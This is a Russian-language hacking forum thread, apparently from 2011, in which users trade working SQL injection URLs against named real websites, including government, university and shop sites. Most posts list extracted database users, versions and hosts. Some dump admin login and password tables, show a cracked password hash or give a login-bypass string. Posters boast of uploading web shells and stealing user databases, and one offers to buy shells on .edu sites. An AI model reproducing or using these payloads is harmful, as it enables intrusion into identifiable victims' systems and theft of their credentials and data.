http://www.globaltech.by/catalog.php?catId=7+and+1=0+union+select+group_concat%28concat_ws%280x3a3a3a,Id,name,login,pass,accesslevel,Id,name,login,pass,accesslevel%29+separator+0x0b%29+from+users+limit+0,20--&sId=35&item=222
----
http://www.dried.su/catalog.php?do=more&catid=3+and+1=0+union+select+1,2,group_concat%28concat_ws%280x3a3a3a,id,login,password,email,rights,new_password%29+separator+0x0b%29,4,5,6,7,8,9+from+cms_administrators+limit+0,20--&id=27
http://www.visiodance.ru/catalog/?dance=-1%20and%201=2%20union%20all%20select%201,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(char(58),@@version,user(),database()),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19+--
[COLOR=Sienna]5.1.56-log visiodance@localhost visiodance[/COLOR]
пассы не расшифровал.....дерзайте
Osstudio
11.05.2011, 15:48
http://www.aksline.ru/index.php?catid=11+and+1=0+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x616b736c696e65--
Дерзайте, поле с админкой прямо перед носом!
Cennarios
11.05.2011, 19:00
http://[COLOR=Red]radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+[/COLOR]&folder=people
Osstudio
11.05.2011, 20:35
http://www.iorta.com/catalog.php?catid=-47+and+1=0+union+select+unhex%28hex%28concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29%29%29,2--
[QUOTE=Osstudio]http://www.iorta.com/catalog.php?catid=-47+and+1=0+union+select+unhex%28hex%28concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29%29%29,2--[/QUOTE]
очуметь
там 687 таблиц
http://www.fishres.ru/news/news.php?id=-18167+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database()),4,5,6,7,8,9+--
[COLOR=Sienna]4.0.27-log murfish4_test@v28.valuehost.ru murfish4_test[/COLOR]
Cennarios
12.05.2011, 09:55
http://[COLOR=Red]www.opensys.ro/content.php?id=-16%27+union+select+1,2,3,version%28%29,5[/COLOR]--+
Osstudio
12.05.2011, 14:49
[QUOTE=rudi]очуметь
там 687 таблиц[/QUOTE]
Это ещё не так много) :D
http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+
4.0.25:smdaily2@localhost:smdaily2
----------------------------
http://www.scooterpart.net/products.php?id=175+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+admins--+
---------------------------
http://www.repropaint.com/Davinci/detail.php?Id=368+and+1=2+UnIon+selECt+1,concat_ws(0x3a,id,naam,paswoord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+login--+
--------------------------
http://www.reichenwies.de/shop/product_details.php?id=65+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,u_name,u_password,u_privilege),4,5,6,7,8,9,10,11,12+from+fs_users--+
------------------------
http://www.racemotorparts.com/products.php?id=1053+and+1=2+UnIon+selECt+1,2,concat_ws(username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admins--+
----------------------
http://www.ppfmaster.ru/news.php?id=1+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--+
5.0.92-community-log:ppfmaste_admin@localhost:ppfmaste_news
----------------------
http://www.onlinewholesale.us/goods.php?id=143+and+1=2+union+select+1,2,3,concat_ws(0x3a,adminname,adminpass),5+from+w_admin--+
----------------------
http://www.olemiss.edu/debate/debate_news/details.php?id=58'+and+1=2+union+select+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7--+
5.1.30-log:cirlot@localhost:cirlot
Yupinder
12.05.2011, 18:44
http://100.tut.by/area.php?id=-20+UnIon+selECt+1,2,radio_account_login,4,5,radio_account_password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+radio_account+limit+0,1+--+
Osstudio
12.05.2011, 19:21
http://www.vw-club.ru/vw/news/show_news.php?id=700+and+1=0+union+select+1,hex%28database%28%29%29,3,4,5,6--
A_n_d_r_e_i
13.05.2011, 13:47
[COLOR=Teal]http://www.redcross.ru/news.php?nid=-190+union+select+1,2,3,4,group_concat(0x0b,login,0x3a,password)+from+redcross_sql.b_admin+--+[/COLOR]
тиц: 250 пр: 5
File_Priv: no
winstrool
13.05.2011, 14:42
тиц:10 pr:5
http://www.thefanlistings.org/links/index.php?CatID=3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5--
4.1.22-standard:thefanli_backend:thefanli_senior@localhost
pr:3
http://www.spellme.com/catalog/index.php?catid=157+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,11,12--
http://www.asuntoilmoitukset.com/fi/index.php?catid=-11+union+select+concat_ws(0x3a,version(),database(),user()),22--
4.1.24-max-log:asuntojafi:asuntojafi@216.69.186.161
pr:3
http://www.chiptec.net/index.php?catid=26+union+select+1,concat_ws(0x3a,version(),database(),user())--
5.0.88:chiptec0:chiptec0@localhost
pr:3
http://annonces.lalgerie.net/index.php?catid=14+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(concat_ws(0x3a,version(),database(),user()),1,63),+FLOOR(RAND(0)*2)))
5.0.92-community:algerie:sam@localhost
pr:1 тиц:30
http://www.dogstatus.ru/news.php?nid=314+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,0,11,12,13--
5.0.70-log:gb_dogstatus:gb_dogstatus@81.176.226.110
st.gryphon
14.05.2011, 13:23
http://www.akkords.ru/news.php?nid=-8 union select 1,2,3,group_concat(concat_ws(0x3a,id,name,nick,mail,login,pass,band),'<br>'),5,6,7 FROM admin--
тиц 230
winstrool
14.05.2011, 19:02
[QUOTE=st.gryphon]http://www.akkords.ru/news.php?nid=-8 union select 1,2,3,group_concat(concat_ws(0x3a,id,name,nick,mail,login,pass,band),'<br>'),5,6,7 FROM admin--
тиц 230[/QUOTE]
[COLOR=DarkRed]БОЯН:[/COLOR]
http://forum.antichat.ru/threadnav21336-655-10.html
для тех кто не вкурсе, боян смотрим так:
site:forum.antichat.ru "www.akkords.ru"
pr:6 тиц:30 http://www.y12.doe.gov/news/release.php?id=224+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,11--
y12user@y12web4:5.1.35:y12doegov
pr:6
http://www.nsb.gov.bt/index.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8--
[COLOR=Green]root[/COLOR]@localhost:5.0.22:new
pr:6 тиц:30
http://www.gov.ai/story.php?id=254+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(concat_ws(0x3a,VERSION(),user(),database()),1,63),+FLOOR(RAND(0)*2)))
4.1.11:webuser@localhost:public_relations
moodoone
16.05.2011, 17:58
https://www.dezinfector.ru/?new_id=-7+union+select+1,2,3,concat_ws%280x3a,login,password%29,5,6+from+drweb_cms_user--
bloodAngel
16.05.2011, 21:00
два шопи ))) http://www.tribbletoys.com/product_info.php?id=5-999.9+union+select+1,2,version(),database(),5,6,7,8,9,10--
5.0.91-log \**/tribbles
http://theshopnewyork.com/productinfo.php?id=1189-999.9+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
5.0.91-log \**/gomezny_products
Osstudio
16.05.2011, 23:18
http://www.pkpp.ru/press.php?id=486+and+1=0+union+select+1,2,3,4,5,6,7,group_concat%28table_name+separator+0x3a%29,9+from+information_schema.tables+where+table_schema=0x706B70706462--
documents:news:publications:vacancies
Osstudio
17.05.2011, 17:16
http://www.credit-center.ru/news.php?id_news=-92+union+select+1,version(),3,4,5--+
==
http://sibselmash.nsk.ru/news.php?id=150+and+1=0+union+select+1,database%28 %29,3,version%28%29,user%28%29,6,7--
==
http://www.nordsy.spb.ru/sv2/news.php?id=103+order+by+7--+
http://www.batcon.org/index.php/all-about-bats/species-profiles.html?task=detail&species=-2160+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6--&country=43&state=all&family=all&limitstart=0
Username: [COLOR=DarkOrange]beejbat_admin@10.10.10.136[/COLOR]
Version: [COLOR=DarkOrange]5.0.77-log[/COLOR]
Database: [COLOR=DarkOrange]beejbat_vrc[/COLOR]
Google PR: [COLOR=Green]7[/COLOR]
http://www.batcon.org/administrator/
DezMond™
18.05.2011, 19:43
[COLOR=DarkOrange]ТИЦ130 PR7[/COLOR]
http://www.ircam.fr/media/scripts/calendrier/oai/oai2.php?verb=GetRecord&metadataPrefix=mods&identifier=oai:ircam.fr:programmation:281'+and+1=0+union+select+group_concat(concat_ws(0x3a3a,user,password)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+--+
http://graffs.com.ua/index.php?page=products&shop=1&cat=19&scat=&sscat=64&id=-216+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=0x677261666673+--+
[COLOR=Green]version[/COLOR]: 5.5.9-log
[COLOR=Green]database[/COLOR]: graffs
[COLOR=Green]user[/COLOR]: graffs@hosting2.colocall.net
A_n_d_r_e_i
20.05.2011, 01:48
*Удаленно*
http://fmspk.ru/press.php?id=-10+union+select+1,2,3,group_concat(0x0b,name,0x3a,pass),5,6+from+usrpsw+--
File_Priv=no
ТИЦ 60 PR 2
Логиниться сразу на сайте, но там htpasswd :(
Да, простите что выложу пасс и логин, но я не могу сделать иначе. На таком серьезном ресурсе..
user:b89e5f6497323d36c7b00413d0ba15c6:[COLOR=DarkOrange]писька[/COLOR]
http://i010.radikal.ru/1105/97/72978ea51a06.jpg
Dr.Z3r0:
[SIZE=4][COLOR=DarkOrange]кто еще раз вставит картинку в пост со взломанного ресурса, тот получит банан[/COLOR][/SIZE]
Osstudio
20.05.2011, 14:12
http://www.vs.com.ua/a-news/news.php?id=16+and+1=0+union+select+1,2,3,version%28%29,5,database%28%29,7,8,9,10--
http://www.neilprydemaui.com/items.php?id=476+union+select+1,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--
version: 5.1.41
database: neilprydemaui_2
user: neilprydemaui@localhost
Кроме этой базы там есть еще пару, можно слить базу пользователей форуме. (слил =) )
Osstudio
20.05.2011, 22:03
[QUOTE=Lindows]http://www.neilprydemaui.com/items.php?id=476+union+select+1,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--
version: 5.1.41
database: neilprydemaui_2
user: neilprydemaui@localhost
Кроме этой базы там есть еще пару, можно слить базу пользователей форуме. (слил =) )[/QUOTE]
Там их 13 :)
http://www.basicjokes.com/djoke.php?id=-886+union+select+1,concat_ws%280x3b,user%28%29,version%28%29,database%28%29%29--
version: 5.0.77
database: basicjok_Jokes
user: basicjok_jokes@localhost
Osstudio
21.05.2011, 22:22
http://www.srbm.ru/news.php?news_id=809+and+1=0+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Cennarios
22.05.2011, 15:32
http://[COLOR=Red]www.unesco.org/archives/newsletters/cahiers/cahieritems.php?idArticle=15%20and%20row%281,1%29%3E%28select%20count%28*%29,concat%28version%28%29,0x3a,floor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29[/COLOR]--
DIEZalok
22.05.2011, 17:47
http://sitemapnow.com/news.php?id=9' and !1 union select 1,mid(group_concat(concat_ws(0x3a, id, user, email, password)),1,1024),3,4,5,6,7 from sm_users-- -
http://sitemapnow.com/articles.php?id=10' and !1 union select 1,version(),3,4,5,6,7-- -
В форме входа
логин: ' or id=1-- -
пасс: уф
Osstudio
22.05.2011, 18:28
http://driverb.ru/news.php?id_news=55+and+1=0+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
P.S Отображается в title :)
А также там всего 8 БД, и это всё разные сайты, aaea.ru и т.д....уже на всех я залил шелл...
MetalKvantor
23.05.2011, 02:23
тИЦ:60
http://pingpong.su/info.php?sect_id&id=-1+union+select+all+1,2,group_concat(0x0b,login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+conf_users
MetalKvantor
23.05.2011, 04:01
http://sibabitur.ru/src8_vuz_catalog2.php?id=-1+union+select+all+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables
Дальше копаться не стал...
winstrool
23.05.2011, 16:34
pr 3 тиц 10
http://uzfiles.com/videos.php?id=-331+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9+from+members--
jurabek@208.109.162.156:4.1.20:jurabek
pr3 тиц 700
http://www.7kanal.com/author.php?id=-159+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,43--
sedmoy_user@localhost:4.1.22-standard-log:sedmoy_db
pr5 тиц 425
http://paraavis.com/index1.php?id=371&secid=-500+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6
paraav01@fe114.hc.ru:5.1.54-log:wwwparaaviscom
pr1 тиц 10
http://alexgroupe.com/kofevarka.php?opr=-27+union+select+1,2,3,concat_ws(0x3a,user(),version(),database())
alexgroupe_7@localhost:5.0.81-community:alexgroupe_7
pr5 тиц 100
http://mediacia.com/publi.php?id=-55+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4--
web_mediacia_com@zvm13.host.ru:4.0.27-log:web_mediacia_com
http://www.zabudova.by/index.php?module=view_news&nid=37+union+select+1,2,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,4,5,6--
http://www.svenskaspraket.org/pesni.php?id=-9+union+select+concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,2--
http://www.at-sib.ru/internet.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5--
http://zoorinok.com.ua/details_topic.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7--
http://www.nugabestrostov.ru/article.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11--
winstrool
23.05.2011, 23:49
pr 7 тиц 90
http://archive.stsci.edu/proposal_search.php?id=-12119+union+select+@@version--&mission=hst
Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (X64) Sep 16 2010 19:43:16 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
HellFire
24.05.2011, 09:12
[COLOR=Red]Всякая левота:[/COLOR]
http://www.waterfallsnorthwest.com/nws/waterfall.php?num=636-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9--
PR: 5
Database Version: 5.0.91-log
Database name: waterfa
User name: sorefeet@cgi1204.int.bizland.net
http://www.simonlawpc.com/meettheattorneysdetail.php?id=1-100+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6--
PR: 3
Database Version: 4.1.22-log
Database name: simonlaw
User name: simonlawuser@localhost
winstrool
24.05.2011, 14:13
pr 3 тиц 10
http://cocktails-r.us/bar_window_bottle.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5--
5.0.91-community:cocktail_bar:cocktail_bar@localhost
http://basexx.us/mainProduct.php?id=1600+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
5.0.51a-3ubuntu5.4:dicotaweb:dico45fg@localhost
http://nsp.oazis.us/k1.php?id=-24'+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0+--+
5.0.91-community-log:vik0azis_nsp:vik0azis_vikuzr@localhost
pr 4
http://www.sea-of-life.com/product.php?id=-92+union+select+1,2,3,4,5,6,7,8,9,0,11,2,13,14,concat_ws(0x3a,version(),database(),user()),16,17,18,19,20,21,22,23--
5.0.45-COMMUNITY:QUMERAN:QUMERAN@192.168.1.117
http://www.ledlightsfor.com/product.php?id=-583+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8--
5.1.56-community-log:daytimer_haisun:daytimer_haisun@localhost
pr 3 тиц 10
http://www.pan-stp.com/product.php?cat=213&id=-3806'+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws(0x3a,version(),database(),user())+--+
5.0.90:pan_base:pan_base@localhost
http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),database(),user()),17,18,19,20--
5.1.50-lk-log:eshokcomua:eshokcomua@localhost
pr 2 тиц 10
http://www.tornadosport.com.ua/product.php?id=-5'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,11,12,13,14,1,16,17,18+--+
5.0.77-log:tornados_tornado:tornados_tornado@localhost
pr 2
http://www.granik-avto.com/product.php?id=-1609'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,concat_ws(0x3a,version(),database(),user())+--+
5.0.26-log:avtogradom:avtogradom@localhost
pr 2 тиц 30
http://www.uzg.com.ua/product.php?id=-815'+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,33,6,7,8,9,0,11,12,13,14+--+
5.0.77-log:uzg:uzg@localhost
http://www.intline.ru/shwplans.php?oid=-15+union+select+1,group_concat%28concat_ws%280x3a,login,password%29+separator+0x0b%29,3,4,5+from+admin+--+
version: 5.0.45-log
database: inetproj
user: intline@localhost
тИЦ: 60 | PR: 3
Страниц в Яндекс: 696
IP: 195.178.216.41 /Moscow
Reverse ip: intline.ru | mioo.ru
http://www.century21today.com/office.php?oID=-1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29+separator+0x0b%29,3+from+adminaccounts+--+
version: 5.1.44-community
database: c21site
user: idx@localhost
PR: 2
Страниц в Яндекс: 905
IP: 216.55.163.25 /California
A_n_d_r_e_i
24.05.2011, 23:03
http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,host,0x3a,user,0x3a,password),8,9,10,11,12+from+mysql.user%20--
http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,id,0x3a,login,0x3a,password),8,9,10,11,12+from+inday_concepton.user%20--
File_Priv=[COLOR="DarkOrange"]Yes[/COLOR]
Expl0ited
25.05.2011, 18:02
http://itc.virginia.edu/services/catServicesWithDesc.php?catID=0'union(select(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))--+
насканил сегодня=)
http://www.africafiles.org/article.asp?ID=4564-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- [0:0]
http://www.paulinesbeauty.ie/category.php?catID=8-999.9+union+select+1,2,3,4,5-- [0:0]
http://directory.designer.am/category.php?catid=2-999.9+union+select+1,2,3,4,5-- [0:0]
http://www.pactox.com/tests/category.php?catID=6-999.9+union+select+1,2,3,4,5-- [0:0]
http://www.j-source.ca/english_new/category.php?catid=274-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://mkbuteyn.org/display_item.php?id=3-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11-- [0:0]
http://www.stuffasseenontv.com/display_item.php?id=319-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- [0:0]
http://www.bambooman.com.au/display_item.php?id=50-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- [0:0]
http://westernarchives.lib.muohio.edu/show_pi_sample.php?cat_id=10-999.9+union+select+1,2,3,4-- [0:0]
http://www.thaigaragecenter.com/view_detail.php?id=3506-999.9+union+select+1,2,3,4,5-- [0:0]
http://www.pakwatan.com/view_detail.php?pageNum_rsNational=50&totalRows_rsNational=416&id=35-999.9+union+select+1,2,3,4,5,6,7,8,9,10-- [0:0]
http://www.jaipurpropertysearch.com/view_detail.php?id=4-999.9+union+select+1,2,3,4-- [0:0]
http://www.motorhill.co.uk/view_detail.php?id=52-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://www.horpak4u.com/view_detail.php?id=3245-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://globusmakaan.com/view_detail.php?id=98&cat=7&p_id=24-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://www.service-js.jp/cms/show_item.php?id=55-999.9+union+select+1,2,3,4-- [0:0]
http://shoppingswap.com/show_item.php?id=48-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- [0:0]
http://www.marc-yeats.co.uk/show_item.php?id=155-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- [0:0]
http://www.reflections-pa.com/show_item.php?id=168-999.9+union+select+1,2,3,4,5,6,7-- [0:0]
http://starsofpaid4.de/blog/show_item.php?id=64-999.9+union+select+1,2,3,4-- [0:0]
http://www.gamebooks.org/show_item.php?id=8420-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- [0:0]
http://www.net-tls.it/life-sciences_toscana/show_item.php?id=69EP2WBKTA&pub_details_uni=1-999.9+union+select+1,2,3,4-- [0:0]
http://inscompanies.com/review/recommend.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10-- [0:0]
http://onlinestocktradingreviews.com/review/index2.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://www.arghandproducts.org/detail1.php?item_ID=17-999.9+union+select+1,2,3,4,5-- [0:0]
http://www.sushimonsters.com/review/recommend.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- [0:0]
http://apetyczna.pl/print.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10-- [0:0]
http://webhostinggeeks.com/user-reviews/recommend.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10-- [0:0]
http://www.cloudynights.com/item.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- [0:0]
http://www.abbysdesigns.com/popup.php?item_id=17-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://www.sportshall.ca/accessible/whatson_event_detail.php?item_id=17-999.9+union+select+1,2,3,4-- [0:0]
http://www.mopress.com/online_store.php?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11-- [0:0]
http://www.bcspeakers.com/product.php?id=160-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- [0:0]
http://www.bullydog.com/product.php?ID=4-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://www.rolcogames.com/product.php?id=40&catid=14-999.9+union+select+1,2,3,4,5-- [0:0]
http://www.cleanenergy.org/index.php?/Wired-In-Details.html?item_id=17-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- [0:0]
http://www.subdecay.com/product.php?id=1-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- [0:0]
http://www.thecableco.com/product.php?id=7249-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- [0:0]
http://www.pqube.co.uk/product.php?id=63-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- [0:0]
http://www.ultimatumz.com/product.php?id=16-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- [0:0]
http://www.somcan.com/index.php?int=Catalogue&subpg=ListProduct&srchby=subcategory_uid&item_id=17-999.9+union+select+1,2,3,4,5,6,7-- [0:0]
[+]MySQL Info: u10283@10.8.1.181:5.0.90-log:u10283:binjportbld-freebsd7.3
[+]Printable field: 9
[+]Vuln URL: http://apcom.ru/ru/page/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
winstrool
27.05.2011, 12:45
pr 3 тиц 20
http://www.usbgifts.com.ua/product.php?id=33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
5.0.51a-24+lenny5:usbgifts:u_usbgifts@localhost
pr 1 тиц 10
http://www.ecober.com/contact.php?lang=ru&id=-6+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,0,11,12--
5.0.92-community:ecoberco_data:ecoberco_clreco@localhost
pr 1 тиц 160
http://gamez-top.com/index.php?total=32'&cat_id=7'+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+&page=1
5.1.55:baker018_db0:baker018_db0@88.214.230.5
Megwarez
28.05.2011, 08:36
PR2 DMOZ
http://www.moseleytennisclub.co.uk/story.php?id=-1+union+select+1,group_concat%280x0b,table_name%29,3,4+from+information_schema.tables+--
totenkopf
28.05.2011, 09:48
http://www.virtualracesystem.co.uk/webpage.php?PageID=-3+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9+--+
dbo130187829@212.227.127.175:4.0.27-max-log:db130187829
http://www.lightpollution.org.uk/index.php?pageId=-5+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16+--+
admin@localhost:5.0.38-Ubuntu_0ubuntu1.4-log:lightPollution
http://www.congregationalinsurance.com/info_news.php?ID=185+AND+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12+--+
dbo260186357@localhost:4.0.27-standard:db260186357
http://www.vernonmorris.co.uk/product-detail.php?category=2&id=17'/**/AND/**/0/**/UNION/**/SELECT/**/concat_ws(0x3a,user(),version(),database())/*
p8urrows@localhost:5.0.27-community-nt:vernonmorris
http://www.knoydart.co.uk/display.php?category=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,binary(concat_ws(0x3a,user(),version(),database())),12,13,14,15+--+
knoydart@lsh505.securepod.com:4.1.11-Debian_4sarge8:knoydart
http://www.tiller.co.uk/index.php?sid=courses&GET_crsID=-17'/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),version(),database())+--+'
tiller_admin@localhost:5.0.92-community:tiller_awl
http://www.letmeplay.co.uk/content.php?sid=50'+AND+0+/*!union*/+/*!select*/+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8+--+
amymat_admin@localhost:5.1.52:amymat_site
winstrool
29.05.2011, 15:22
pr 2
http://www.lesvosisland.gr/en/content.php?Mid=48&Sid=-50+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user())%20%20,9,0,11,12,13,14,15,16,17,18,19
5.0.91-community:lesvoisl_lesvoisl:lesvoisl_lsvUSR@localhost
pr 5
http://www.thx.gov.cn/content/server_view.php?sid=50&id=-71+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17,18,19,2020+--+
4.0.17-standard-log:5152_web:user5152@localhost
pr 3 тиц 50
http://www.huntworld.ru/catalog.php?r=1510+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
5.1.41-log:huntworld_bs:huntworld_bs@10.1.57.139
pr 2 тиц 20
http://asterisk-voip.ru/content.php?id=-361'+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5+--+
5.1.54:asterisk:asterisk@localhost
pr 1
http://www.novgorod-avto.ru/content.php?id=-2+union+select+1,concat_ws(0x3a,version(),database(),user()),3,41--
5.1.50-rel11.4-log:itkin:itkin@localhost
сорри за офтоп, готов покупать у вас шелы в зоне edu
Cennarios
29.05.2011, 15:36
http://[COLOR=Red]www.digiserv.biz/news/display_article.php?id=-36+union+select+1,user%28%29,3,4,5[/COLOR]--+
http://kitareview.com/news.php?id=589 есть скуля)Но не могу кол-во полей определить.Кавычку ставишь,все на новой странице открывается.Люди объясните?
[QUOTE=MTV]http://kitareview.com/news.php?id=589 есть скуля)Но не могу кол-во полей определить.Кавычку ставишь,все на новой странице открывается.Люди объясните?[/QUOTE]
http://kitareview.com/news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
winstrool
29.05.2011, 19:18
pr 3 тиц 70
http://www.7802662.ru/content.php?id=10+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())+from+eusers+limit+0,1),1,63),+FLOOR(RAND(0)*2)))--
5.0.92-log:hotline_test11:hotline_base7802@localhost
pr 1 тиц 10
http://www.gardencentr.ru/content.php?id=-4'+union+select+concat_ws(0x3a,version(),database(),user())+--+
4.1.21-log:udb2156:Uwww2156S@localhost
pr 1
